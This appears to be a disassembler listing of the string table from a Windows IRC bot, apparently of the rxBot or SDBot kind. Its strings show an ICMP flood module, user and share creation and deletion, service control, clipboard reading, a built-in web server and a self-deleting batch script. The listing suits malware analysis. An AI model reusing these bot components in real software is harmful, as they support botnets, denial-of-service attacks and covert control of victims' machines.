db '<TABLE BORDER="0">',0Dh,0Ah,0
align 4
aHtmlHeadTitleI db '<HTML>',0Dh,0Ah ; DATA XREF: sub_4030C4+75�o
db '<HEAD>',0Dh,0Ah
db '<TITLE>Index of %s</TITLE>',0Dh,0Ah
db '</HEAD>',0Dh,0Ah
db '<BODY>',0Dh,0Ah,0
align 4
aPrivmsgSSearch db 'PRIVMSG %s :Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_4030C4+3F�o
asc_420328: ; DATA XREF: sub_4030C4+1E�o
; sub_403B4C+F7�o ...
dw 0Ah
unicode 0, <>,0
aSSHttp1_1Refer db '%s %s HTTP/1.1',0Ah ; DATA XREF: sub_4038B7+8A�o
db 'Referer: %s',0Ah
db 'Host: %s',0Ah
db 'Connection: close',0Ah
db 0Ah,0
align 8
aHttp1_0200Ok_0 db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_4039DE+E4�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Content-Length: %i',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHttp1_0200OkSe db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_4039DE+CA�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHhMmSs db 'HH:mm:ss',0 ; DATA XREF: sub_4039DE+94�o
; sub_40FE1F+17D�o ...
align 10h
aDddDdMmmYyyy db 'ddd, dd MMM yyyy',0 ; DATA XREF: sub_4039DE+7B�o
align 4
aApplicationOct db 'application/octet-stream',0 ; DATA XREF: sub_4039DE:loc_403A46�o
align 10h
aTextHtml db 'text/html',0 ; DATA XREF: sub_4039DE+61�o
align 4
aHttpdFailedT_0 db '[HTTPD]: Failed to start worker thread, error: <%d>.',0
; DATA XREF: sub_403B4C+287�o
align 4
aHttpdWorkerThr db '[HTTPD]: Worker thread of server thread: %d.',0
; DATA XREF: sub_403B4C+213�o
align 4
asc_4205E4: ; DATA XREF: sub_403B4C+16E�o
unicode 0, <*>,0
aS_1 db '%s',0 ; DATA XREF: sub_403B4C+31�o
; sub_4045DD+44�o ...
align 4
aS_6 db '\%s',0 ; DATA XREF: sub_403B4C+27�o
aHttpdErrorServ db '[HTTPD]: Error: server failed, returned: <%d>.',0
; DATA XREF: sub_403E06+3E0�o
align 10h
asc_420620 db 0Dh,0Ah,0 ; DATA XREF: sub_403E06+296�o
align 4
aGet db 'GET ',0 ; DATA XREF: sub_403E06+22D�o
align 10h
aIcmpErrorSendi db '[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Return'
; DATA XREF: sub_404249+2F2�o
db 'ed: <%d>.',0
align 10h
aIcmpDoneWithSF db '[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/s'
; DATA XREF: sub_404249+288�o
db 'ec (%dMB).',0
aIcmpInvalidTar db '[ICMP]: Invalid target IP.',0 ; DATA XREF: sub_404249+B6�o
align 4
aIcmpErrorSetso db '[ICMP]: Error: setsockopt() failed, returned: <%d>.',0
; DATA XREF: sub_404249+8E�o
aIcmpErrorSocke db '[ICMP]: Error: socket() failed, returned: <%d>.',0
; DATA XREF: sub_404249+49�o
aSSS db '%s %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_4045DD+69�o
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_4045DD+16�o
; sub_4078FA+703�o
aNotice db 'NOTICE',0 ; DATA XREF: sub_4045DD+F�o
; sub_4078FA+711�o
align 4
aSqldisconnect db 'SQLDisconnect',0 ; DATA XREF: sub_40468E+B8C�o
align 4
aSqlfreehandle db 'SQLFreeHandle',0 ; DATA XREF: sub_40468E+B7F�o
align 4
aSqlallochandle db 'SQLAllocHandle',0 ; DATA XREF: sub_40468E+B72�o
align 4
aSqlexecdirect db 'SQLExecDirect',0 ; DATA XREF: sub_40468E+B65�o
align 4
aSqlsetenvattr db 'SQLSetEnvAttr',0 ; DATA XREF: sub_40468E+B58�o
align 4
aSqldriverconne db 'SQLDriverConnect',0 ; DATA XREF: sub_40468E+B50�o
align 4
aOdbc32_dll db 'odbc32.dll',0 ; DATA XREF: sub_40468E:loc_4051D1�o
align 4
aShchangenotify db 'SHChangeNotify',0 ; DATA XREF: sub_40468E+B0E�o
align 4
aShellexecutea db 'ShellExecuteA',0 ; DATA XREF: sub_40468E+B06�o
align 4
aShell32_dll db 'shell32.dll',0 ; DATA XREF: sub_40468E:loc_405187�o
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_40468E+AB4�o
align 4
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_40468E+AA7�o
align 4
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_40468E+A9A�o
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_40468E+A92�o
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_40468E:loc_405113�o
aDeleteipnetent db 'DeleteIpNetEntry',0 ; DATA XREF: sub_40468E+A50�o
align 4
aGetipnettable db 'GetIpNetTable',0 ; DATA XREF: sub_40468E+A48�o
align 4
aIphlpapi_dll db 'iphlpapi.dll',0 ; DATA XREF: sub_40468E:loc_4050C9�o
align 4
aDnsflushreso_0 db 'DnsFlushResolverCacheEntry_A',0 ; DATA XREF: sub_40468E+A06�o
align 4
aDnsflushresolv db 'DnsFlushResolverCache',0 ; DATA XREF: sub_40468E+9FE�o
align 10h
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_40468E:loc_40507F�o
align 4
aNetmessagebuff db 'NetMessageBufferSend',0 ; DATA XREF: sub_40468E+974�o
align 4
aNetusergetinfo db 'NetUserGetInfo',0 ; DATA XREF: sub_40468E+967�o
align 4
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_40468E+95A�o
aNetuserdel db 'NetUserDel',0 ; DATA XREF: sub_40468E+94D�o
align 4
aNetuseradd db 'NetUserAdd',0 ; DATA XREF: sub_40468E+940�o
align 4
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_40468E+933�o
align 4
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_40468E+926�o
align 4
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_40468E+919�o
align 10h
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_40468E+90C�o
align 10h
aNetsharedel db 'NetShareDel',0 ; DATA XREF: sub_40468E+8FF�o
aNetshareadd db 'NetShareAdd',0 ; DATA XREF: sub_40468E+8F7�o
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_40468E:loc_404F74�o
align 4
aIcmpsendecho db 'IcmpSendEcho',0 ; DATA XREF: sub_40468E+8A9�o
align 4
aIcmpclosehandl db 'IcmpCloseHandle',0 ; DATA XREF: sub_40468E+89C�o
aIcmpcreatefile db 'IcmpCreateFile',0 ; DATA XREF: sub_40468E+894�o
align 4
aIcmp_dll db 'icmp.dll',0 ; DATA XREF: sub_40468E:loc_404F15�o
align 4
aMozilla4_0Comp db 'Mozilla/4.0 (compatible)',0 ; DATA XREF: sub_40468E+85A�o
align 10h
aInternetcloseh db 'InternetCloseHandle',0 ; DATA XREF: sub_40468E+7E8�o
aInternetreadfi db 'InternetReadFile',0 ; DATA XREF: sub_40468E+7DB�o
align 4
aInternetcracku db 'InternetCrackUrlA',0 ; DATA XREF: sub_40468E+7CE�o
align 4
aInternetopenur db 'InternetOpenUrlA',0 ; DATA XREF: sub_40468E+7C1�o
align 10h
aInternetopena db 'InternetOpenA',0 ; DATA XREF: sub_40468E+7B4�o
align 10h
aInternetconnec db 'InternetConnectA',0 ; DATA XREF: sub_40468E+7A7�o
align 4
aHttpsendreques db 'HttpSendRequestA',0 ; DATA XREF: sub_40468E+79A�o
align 4
aHttpopenreques db 'HttpOpenRequestA',0 ; DATA XREF: sub_40468E+78D�o
align 4
aInternetgetc_0 db 'InternetGetConnectedStateEx',0 ; DATA XREF: sub_40468E+780�o
aInternetgetcon db 'InternetGetConnectedState',0 ; DATA XREF: sub_40468E+778�o
align 4
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_40468E:loc_404DF5�o
aClosesocket db 'closesocket',0 ; DATA XREF: sub_40468E+62E�o
aGetpeername db 'getpeername',0 ; DATA XREF: sub_40468E+621�o
aGethostbyaddr db 'gethostbyaddr',0 ; DATA XREF: sub_40468E+614�o
align 4
aGethostbyname db 'gethostbyname',0 ; DATA XREF: sub_40468E+607�o
align 4
aGethostname db 'gethostname',0 ; DATA XREF: sub_40468E+5FA�o
aGetsockname db 'getsockname',0 ; DATA XREF: sub_40468E+5ED�o
aSetsockopt db 'setsockopt',0 ; DATA XREF: sub_40468E+5E0�o
align 4
aAccept db 'accept',0 ; DATA XREF: sub_40468E+5D3�o
align 4
aListen db 'listen',0 ; DATA XREF: sub_40468E+5C6�o
align 4
aSelect db 'select',0 ; DATA XREF: sub_40468E+5B9�o
align 4
aBind db 'bind',0 ; DATA XREF: sub_40468E+5B1�o
align 4
aRecvfrom db 'recvfrom',0 ; DATA XREF: sub_40468E+59F�o
align 4
aRecv db 'recv',0 ; DATA XREF: sub_40468E+592�o
align 10h
aSendto db 'sendto',0 ; DATA XREF: sub_40468E+585�o
align 4
aSend db 'send',0 ; DATA XREF: sub_40468E+578�o
; sub_4078FA+1DCF�o
align 10h
aNtohl db 'ntohl',0 ; DATA XREF: sub_40468E+56B�o
align 4
aNtohs db 'ntohs',0 ; DATA XREF: sub_40468E+55E�o
align 10h
aHtonl db 'htonl',0 ; DATA XREF: sub_40468E+551�o
align 4
aHtons db 'htons',0 ; DATA XREF: sub_40468E+544�o
align 10h
aInet_addr db 'inet_addr',0 ; DATA XREF: sub_40468E+537�o
align 4
aInet_ntoa db 'inet_ntoa',0 ; DATA XREF: sub_40468E+52A�o
align 4
aConnect db 'connect',0 ; DATA XREF: sub_40468E+51D�o
aIoctlsocket db 'ioctlsocket',0 ; DATA XREF: sub_40468E+510�o
aSocket db 'socket',0 ; DATA XREF: sub_40468E+503�o
align 4
aWsacleanup db 'WSACleanup',0 ; DATA XREF: sub_40468E+4F6�o
align 10h
aWsagetlasterro db 'WSAGetLastError',0 ; DATA XREF: sub_40468E+4E9�o
aWsaioctl db 'WSAIoctl',0 ; DATA XREF: sub_40468E+4DC�o
align 4
a__wsafdisset db '__WSAFDIsSet',0 ; DATA XREF: sub_40468E+4CF�o
align 4
aWsaasyncselect db 'WSAAsyncSelect',0 ; DATA XREF: sub_40468E+4C2�o
align 4
aWsasocketa db 'WSASocketA',0 ; DATA XREF: sub_40468E+4B5�o
align 4
aWsastartup db 'WSAStartup',0 ; DATA XREF: sub_40468E+4AD�o
align 4
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_40468E+49C�o
align 10h
aDeleteobject db 'DeleteObject',0 ; DATA XREF: sub_40468E+429�o
align 10h
aDeletedc db 'DeleteDC',0 ; DATA XREF: sub_40468E+41C�o
align 4
aBitblt db 'BitBlt',0 ; DATA XREF: sub_40468E+40F�o
align 4
aSelectobject db 'SelectObject',0 ; DATA XREF: sub_40468E+402�o
align 4
aGetdibcolortab db 'GetDIBColorTable',0 ; DATA XREF: sub_40468E+3F5�o
align 4
aGetdevicecaps db 'GetDeviceCaps',0 ; DATA XREF: sub_40468E+3E8�o
align 4
aCreatecompatib db 'CreateCompatibleDC',0 ; DATA XREF: sub_40468E+3DB�o
align 4
aCreatedibsecti db 'CreateDIBSection',0 ; DATA XREF: sub_40468E+3CE�o
align 10h
aCreatedca db 'CreateDCA',0 ; DATA XREF: sub_40468E+3C6�o
align 4
aGdi32_dll db 'gdi32.dll',0 ; DATA XREF: sub_40468E:loc_404A43�o
align 4
aGetusernamea db 'GetUserNameA',0 ; DATA XREF: sub_40468E:loc_404A1B�o
align 4
aIsvalidsecurit db 'IsValidSecurityDescriptor',0 ; DATA XREF: sub_40468E+335�o
align 4
aEnumservicesst db 'EnumServicesStatusA',0 ; DATA XREF: sub_40468E+328�o
aCloseserviceha db 'CloseServiceHandle',0 ; DATA XREF: sub_40468E+31B�o
align 4
aDeleteservice db 'DeleteService',0 ; DATA XREF: sub_40468E+30E�o
align 4
aControlservice db 'ControlService',0 ; DATA XREF: sub_40468E+301�o
align 4
aStartservicea db 'StartServiceA',0 ; DATA XREF: sub_40468E+2F4�o
align 4
aOpenservicea db 'OpenServiceA',0 ; DATA XREF: sub_40468E+2E7�o
align 4
aOpenscmanagera db 'OpenSCManagerA',0 ; DATA XREF: sub_40468E:loc_40496D�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_40468E+2AF�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_40468E+2A2�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_40468E:loc_404928�o
align 10h
aRegclosekey db 'RegCloseKey',0 ; DATA XREF: sub_40468E+252�o
aRegdeletevalue db 'RegDeleteValueA',0 ; DATA XREF: sub_40468E+245�o
aRegqueryvaluee db 'RegQueryValueExA',0 ; DATA XREF: sub_40468E+238�o
align 10h
aRegsetvalueexa db 'RegSetValueExA',0 ; DATA XREF: sub_40468E+22B�o
align 10h
aRegcreatekeyex db 'RegCreateKeyExA',0 ; DATA XREF: sub_40468E+21E�o
aRegopenkeyexa db 'RegOpenKeyExA',0 ; DATA XREF: sub_40468E+216�o
align 10h
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: sub_40468E:loc_404893�o
align 10h
aExitwindowsex db 'ExitWindowsEx',0 ; DATA XREF: sub_40468E+1A0�o
align 10h
aCloseclipboard db 'CloseClipboard',0 ; DATA XREF: sub_40468E+193�o
align 10h
aGetclipboardda db 'GetClipboardData',0 ; DATA XREF: sub_40468E+186�o
align 4
aOpenclipboard db 'OpenClipboard',0 ; DATA XREF: sub_40468E+179�o
align 4
aDestroywindow db 'DestroyWindow',0 ; DATA XREF: sub_40468E+16C�o
align 4
aIswindow db 'IsWindow',0 ; DATA XREF: sub_40468E+15F�o
align 10h
aFindwindowa db 'FindWindowA',0 ; DATA XREF: sub_40468E+152�o
aSendmessagea db 'SendMessageA',0 ; DATA XREF: sub_40468E+14A�o
align 4
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_40468E:loc_4047C3�o
; sub_41D75B+13�o
align 4
aRegisterservic db 'RegisterServiceProcess',0 ; DATA XREF: sub_40468E:loc_404796�o
align 10h
aQueryperform_0 db 'QueryPerformanceFrequency',0 ; DATA XREF: sub_40468E+A0�o
align 4
aQueryperforman db 'QueryPerformanceCounter',0 ; DATA XREF: sub_40468E+93�o
aSearchpatha db 'SearchPathA',0 ; DATA XREF: sub_40468E+86�o
aGetdrivetypea db 'GetDriveTypeA',0 ; DATA XREF: sub_40468E+79�o
align 10h
aGetlogicaldriv db 'GetLogicalDriveStringsA',0 ; DATA XREF: sub_40468E+6C�o
aGetdiskfreespa db 'GetDiskFreeSpaceExA',0 ; DATA XREF: sub_40468E+5F�o
aModule32first db 'Module32First',0 ; DATA XREF: sub_40468E+52�o
align 4
aProcess32next db 'Process32Next',0 ; DATA XREF: sub_40468E+45�o
align 4
aProcess32first db 'Process32First',0 ; DATA XREF: sub_40468E+38�o
align 4
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_40468E+2B�o
align 4
aSeterrormode db 'SetErrorMode',0 ; DATA XREF: sub_40468E+23�o
align 4
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_40468E+A�o
; sub_41BBD8+1E�o
align 4
aMainDllTestCom db '[MAIN]: DLL test complete.',0 ; DATA XREF: sub_405277+2BE�o
align 4
aOdbc32_dllFail db 'Odbc32.dll failed. <%d>',0 ; DATA XREF: sub_405277+298�o
aShell32_dllFai db 'Shell32.dll failed. <%d>',0 ; DATA XREF: sub_405277+264�o
align 4
aMpr32_dllFaile db 'Mpr32.dll failed. <%d>',0 ; DATA XREF: sub_405277+230�o
align 10h
aIphlpapi_dllFa db 'Iphlpapi.dll failed. <%d>',0 ; DATA XREF: sub_405277+1FC�o
align 4
aDnsapi_dllFail db 'Dnsapi.dll failed. <%d>',0 ; DATA XREF: sub_405277+1C8�o
aNetapi32_dllFa db 'Netapi32.dll failed. <%d>',0 ; DATA XREF: sub_405277+194�o
align 10h
aIcmp_dllFailed db 'Icmp.dll failed. <%d>',0 ; DATA XREF: sub_405277+160�o
align 4
aWininet_dllFai db 'Wininet.dll failed. <%d>',0 ; DATA XREF: sub_405277+12C�o
align 4
aWs2_32_dllFail db 'Ws2_32.dll failed. <%d>',0 ; DATA XREF: sub_405277+F8�o
aGdi32_dllFaile db 'Gdi32.dll failed. <%d>',0 ; DATA XREF: sub_405277+C4�o
align 4
aAdvapi32_dllFa db 'Advapi32.dll failed. <%d>',0 ; DATA XREF: sub_405277+90�o
align 10h
aUser32_dllFail db 'User32.dll failed. <%d>',0 ; DATA XREF: sub_405277+5C�o
aKernel32_dllFa db 'Kernel32.dll failed. <%d>',0 ; DATA XREF: sub_405277+28�o
align 4
aSErrorSD_ db '%s Error: %s <%d>.',0 ; DATA XREF: sub_405708+72�o
align 4
aMirc_0 db 'mIRC',0 ; DATA XREF: sub_4057CD+6�o
; sub_40E70F+18�o
align 10h
aExplorer_exe db 'explorer.exe',0 ; DATA XREF: sub_40584F+1A�o
align 10h
aSeshutdownpriv db 'SeShutdownPrivilege',0 ; DATA XREF: sub_4058F3+2�o
aComspecCSS db '%%comspec%% /c %s %s',0 ; DATA XREF: sub_405915+13C�o
align 10h
a@echoOffRepeat db '@echo off',0Dh,0Ah ; DATA XREF: sub_405915+80�o
db ':repeat',0Dh,0Ah
db 'del "%%1"',0Dh,0Ah
db 'if exist "%%1" goto repeat',0Dh,0Ah
db 'del "%s"',0
aSdel_bat db '%sdel.bat',0 ; DATA XREF: sub_405915+43�o
align 10h
aContinued db 'Continued',0
align 4
aContinue_0 db 'Continue',0
align 4
aPaused db 'Paused',0
align 10h
aPause_0 db 'Pause',0
align 4
aStopped_0 db 'Stopped',0 ; DATA XREF: .data:0042A42C�o
aStop_0 db 'Stop',0 ; DATA XREF: .data:0042A428�o
align 4
aStarted db 'Started',0 ; DATA XREF: .data:0042A420�o
aStart_0 db 'Start',0 ; DATA XREF: .data:0042A41C�o
align 4
aListed db 'Listed',0 ; DATA XREF: .data:0042A414�o
align 10h
aList_1 db 'List',0 ; DATA XREF: .data:0042A410�o
align 4
aDeleted db 'Deleted',0 ; DATA XREF: .data:0042A408�o
aDelete_0 db 'Delete',0 ; DATA XREF: .data:0042A404�o
align 4
aAdded db 'Added',0 ; DATA XREF: .data:off_42A3FC�o
align 10h
aAdd db 'Add',0 ; DATA XREF: .data:off_42A3F8�o
aAnUnknownErr_0 db 'An unknown error occurred: <%ld>',0 ; DATA XREF: sub_405C4B+128�o
align 4
aTheSystemIsShu db 'The system is shutting down.',0 ; DATA XREF: sub_405C4B:loc_405D5F�o
align 4
aTheServiceHasN db 'The service has not been started.',0 ; DATA XREF: sub_405C4B:loc_405D58�o
align 10h
aTheRequested_1 db 'The requested control code cannot be sent to the service because '
; DATA XREF: sub_405C4B:loc_405D51�o
db 'the state of the service.',0
align 4
aTheServiceHa_0 db 'The service has been marked for deletion.',0
; DATA XREF: sub_405C4B:loc_405D4A�o
align 4
aTheServiceCoul db 'The service could not be logged on. The account does not have the'
; DATA XREF: sub_405C4B:loc_405D43�o
db ' correct access rights.',0
align 4
aTheSpecified_0 db 'The specified service does not exist.',0
; DATA XREF: sub_405C4B:loc_405D3C�o
align 4
aTheServiceHasB db 'The service has been disabled.',0 ; DATA XREF: sub_405C4B:loc_405D35�o
align 10h
aTheServiceDe_0 db 'The service depends on another service that has failed to start.',0
; DATA XREF: sub_405C4B:loc_405D2E�o
align 8
aTheServiceDepe db 'The service depends on a service that does not exist or has been '
; DATA XREF: sub_405C4B:loc_405D27�o
db 'marked for deletion.',0
align 10h
aTheSpecifiedDa db 'The specified database does not exist.',0
; DATA XREF: sub_405C4B:loc_405D20�o
align 4
aAnInstanceOfTh db 'An instance of the service is already running.',0
; DATA XREF: sub_405C4B:loc_405CF5�o
align 4
aTheRequested_0 db 'The requested control code is not valid, or it is unacceptable to'
; DATA XREF: sub_405C4B:loc_405CEE�o
db ' the service.',0
align 4
aTheProcessForT db 'The process for the service was started, but it did not call Star'
; DATA XREF: sub_405C4B:loc_405CE7�o
db 'tServiceCtrlDispatcher.',0
align 4
aAThreadCouldNo db 'A thread could not be created for the service.',0
; DATA XREF: sub_405C4B:loc_405CE0�o
align 4
aTheDatabaseIsL db 'The database is locked.',0 ; DATA XREF: sub_405C4B+8B�o
align 10h
aTheServiceCann db 'The service cannot be stopped because other running services are '
; DATA XREF: sub_405C4B:loc_405CB5�o
db 'dependent on it.',0
align 4
aTheServiceBina db 'The service binary file could not be found.',0
; DATA XREF: sub_405C4B:loc_405CAB�o
aTheHandleDoesN db 'The handle does not have the required access right.',0
; DATA XREF: sub_405C4B:loc_405CA1�o
aTheHandleIsInv db 'The handle is invalid.',0 ; DATA XREF: sub_405C4B:loc_405C97�o
align 4
aTheRequestedCo db 'The requested control code is undefined.',0
; DATA XREF: sub_405C4B:loc_405C8D�o
align 4
aTheSpecifiedSe db 'The specified service name is invalid.',0 ; DATA XREF: sub_405C4B+38�o
align 10h
aSSS_0 db '%s: %s (%s)',0 ; DATA XREF: sub_405DC5+EE�o
aStopped db ' Stopped',0 ; DATA XREF: sub_405DC5:loc_405E94�o
aStarting db ' Starting',0 ; DATA XREF: sub_405DC5:loc_405E8D�o
aStoping db ' Stoping',0 ; DATA XREF: sub_405DC5:loc_405E86�o
aRunning db ' Running',0 ; DATA XREF: sub_405DC5:loc_405E7F�o
aContinuing db ' Continuing',0 ; DATA XREF: sub_405DC5:loc_405E78�o
aPausing db ' Pausing',0 ; DATA XREF: sub_405DC5:loc_405E71�o
aPaused_0 db ' Paused',0 ; DATA XREF: sub_405DC5:loc_405E6A�o
aUnknown_0 db ' Unknown',0 ; DATA XREF: sub_405DC5+9E�o
aTheFollowingWi db 'The following Windows services are registered:',0
; DATA XREF: sub_405DC5+25�o
align 4
aNetUserInfoErr db '[NET]: User info error: <%ld>',0 ; DATA XREF: sub_4060D0+394�o
align 4
aUnitsPerWeekD db 'Units Per Week: %d',0 ; DATA XREF: sub_4060D0+36A�o
align 10h
aMax_StorageD db 'Max. Storage: %d',0 ; DATA XREF: sub_4060D0+33F�o
align 4
aUserSLanguageD db 'User',27h,'s Language: %d',0 ; DATA XREF: sub_4060D0+317�o
aCountryCodeD db 'Country Code: %d',0 ; DATA XREF: sub_4060D0+2EC�o
align 4
aWorkstationsS db 'Workstations: %S',0 ; DATA XREF: sub_4060D0+2C4�o
align 10h
aLogonServerS db 'Logon Server: %S',0 ; DATA XREF: sub_4060D0+299�o
align 4
aLastLogoffD db 'Last Logoff: %d',0 ; DATA XREF: sub_4060D0+271�o
aLastLogonD db 'Last Logon: %d',0 ; DATA XREF: sub_4060D0+246�o
align 4
aNumberOfLogins db 'Number of Logins: %d',0 ; DATA XREF: sub_4060D0+21E�o
align 4
aBadPasswordCou db 'Bad Password Count: %d',0 ; DATA XREF: sub_4060D0+1F3�o
align 4
aPasswordAgeD db 'Password Age: %d',0 ; DATA XREF: sub_4060D0+1CB�o
align 4
aParametersS db 'Parameters: %S',0 ; DATA XREF: sub_4060D0+1A0�o
align 4
aHomeDirectoryS db 'Home Directory: %S',0 ; DATA XREF: sub_4060D0+178�o
align 4
aAuthFlagsD db 'Auth Flags: %d',0 ; DATA XREF: sub_4060D0+14D�o
align 4
aPrivilegeLevel db 'Privilege Level: %s',0 ; DATA XREF: sub_4060D0+125�o
aGuest db 'Guest',0 ; DATA XREF: sub_4060D0:loc_4061E9�o
align 4
aUser_1 db 'User',0 ; DATA XREF: sub_4060D0:loc_4061E2�o
align 10h
aAdministrator db 'Administrator',0 ; DATA XREF: sub_4060D0:loc_4061DB�o
align 10h
aCommentS db 'Comment: %S',0 ; DATA XREF: sub_4060D0+D4�o
aUserCommentS db 'User Comment: %S',0 ; DATA XREF: sub_4060D0+AC�o
align 10h
aFullNameS db 'Full Name: %S',0 ; DATA XREF: sub_4060D0+81�o
align 10h
aAccountS db 'Account: %S',0 ; DATA XREF: sub_4060D0+50�o
aNetworkConnect db 'Network connection not found.',0 ; DATA XREF: sub_40649E:loc_4065B7�o
align 4
aTheUserNameCou db 'The user name could not be found.',0 ; DATA XREF: sub_40649E:loc_4065B0�o
align 10h
aShareNotFound_ db 'Share not found.',0 ; DATA XREF: sub_40649E:loc_4065A9�o
align 4
aTheComputerNam db 'The computer name is invalid.',0 ; DATA XREF: sub_40649E:loc_4065A2�o
align 4
aAnUnknownError db 'An unknown error occurred.',0 ; DATA XREF: sub_40649E:loc_40659B�o
align 10h
aThePasswordIsS db 'The password is shorter than required (or does not meet the passw'
; DATA XREF: sub_40649E:loc_40657E�o
db 'ord policy requirement.)',0
align 4
aTheGroupAlread db 'The group already exists.',0 ; DATA XREF: sub_40649E:loc_406577�o
align 4
aTheUserAccount db 'The user account already exists.',0 ; DATA XREF: sub_40649E:loc_406570�o
align 10h
aTheOperationIs db 'The operation is allowed only on the primary domain controller of'
; DATA XREF: sub_40649E+CB�o
db ' the domain.',0
align 10h
aAGeneralFailur db 'A general failure occurred in the network hardware.',0
; DATA XREF: sub_40649E:loc_406545�o
aLevelParameter db 'Level parameter is invalid.',0 ; DATA XREF: sub_40649E:loc_40653E�o
aDeviceOrDirect db 'Device or directory does not exist.',0
; DATA XREF: sub_40649E:loc_406537�o
aInvalidForRedi db 'Invalid for redirected resource.',0 ; DATA XREF: sub_40649E:loc_40652D�o
align 4
aDuplicateShare db 'Duplicate share name.',0 ; DATA XREF: sub_40649E+85�o
align 10h
aTheNameIsInval db 'The name is invalid.',0 ; DATA XREF: sub_40649E:loc_406507�o
align 4
aAccessDenied_ db 'Access denied.',0 ; DATA XREF: sub_40649E:loc_4064FD�o
align 4
aNotEnoughMemor db 'Not enough memory.',0 ; DATA XREF: sub_40649E:loc_4064F3�o
align 4
aThisNetworkReq db 'This network request is not supported.',0
; DATA XREF: sub_40649E:loc_4064E9�o
align 4
aServerNameNotF db 'Server name not found.',0 ; DATA XREF: sub_40649E:loc_4064DF�o
align 4
aInvalidParamet db 'Invalid parameter.',0 ; DATA XREF: sub_40649E+37�o
align 10h
aNetSServerSMes db '[NET]: %s <Server: %S> <Message: %S>',0 ; DATA XREF: sub_4065CE+A4�o
align 4
aNetMessageSent db '[NET]: Message sent successfully.',0 ; DATA XREF: sub_4065CE+7C�o
align 4
aNetSNoServiceS db '[NET]: %s: No service specified.',0 ; DATA XREF: sub_40668A+65�o
align 10h
aNetErrorWithSe db '[NET]: Error with service: ',27h,'%s',27h,'. %s',0
; DATA XREF: sub_40668A+4F�o
aNetSServiceS_ db '[NET]: %s service: ',27h,'%s',27h,'.',0 ; DATA XREF: sub_40668A+33�o
align 10h
aNetSNoShareSpe db '[NET]: %s: No share specified.',0 ; DATA XREF: sub_406702+AA�o
align 10h
aNetSShareS_ db '[NET]: %s share: ',27h,'%s',27h,'.',0 ; DATA XREF: sub_406702+88�o
align 4
aNetSErrorWithS db '[NET]: %s: Error with share: ',27h,'%s',27h,'. %s',0
; DATA XREF: sub_406702+56�o
align 10h
a14s24s6u4s db '%-14S %-24S %-6u %-4s',0 ; DATA XREF: sub_4067C0+CE�o
align 4
aNo db 'No',0 ; DATA XREF: sub_4067C0+BA�o
align 4
aYes db 'Yes',0 ; DATA XREF: sub_4067C0+B3�o
aNetShareListEr db '[NET]: Share list error: %s <%ld>',0 ; DATA XREF: sub_4067C0+74�o
align 4
aShareNameResou db 'Share name: Resource: Uses: Desc:',0
; DATA XREF: sub_4067C0+1D�o
align 4
aNetSNoUsername db '[NET]: %s: No username specified.',0 ; DATA XREF: sub_4068DF+B5�o
align 10h
aNetSErrorWithU db '[NET]: %s: Error with username: ',27h,'%s',27h,'. %s',0
; DATA XREF: sub_4068DF+93�o
align 4
aNetSUsernameS_ db '[NET]: %s username: ',27h,'%s',27h,'.',0 ; DATA XREF: sub_4068DF+6D�o
align 4
aTotalUsersFoun db 'Total users found: %d.',0 ; DATA XREF: sub_4069A9+144�o
align 10h
aNetAnAccessVio db '[NET]: An access violation has occured.',0
; DATA XREF: sub_4069A9:loc_406A94�o
aS_2 db ' %S',0 ; DATA XREF: sub_4069A9+B8�o
align 10h
aNetUserListErr db '[NET]: User list error: %s <%ld>',0 ; DATA XREF: sub_4069A9+78�o
align 4
aUsernameAccoun db 'Username accounts for local system:',0 ; DATA XREF: sub_4069A9+1F�o
aFlushdnsNotSup db '[FLUSHDNS]: Not supported by this system.',0
; DATA XREF: sub_406B55:loc_406C2C�o
align 4
aFlushdnsUnable db '[FLUSHDNS]: Unable to allocation ARP cache.',0
; DATA XREF: sub_406B55:loc_406BFD�o
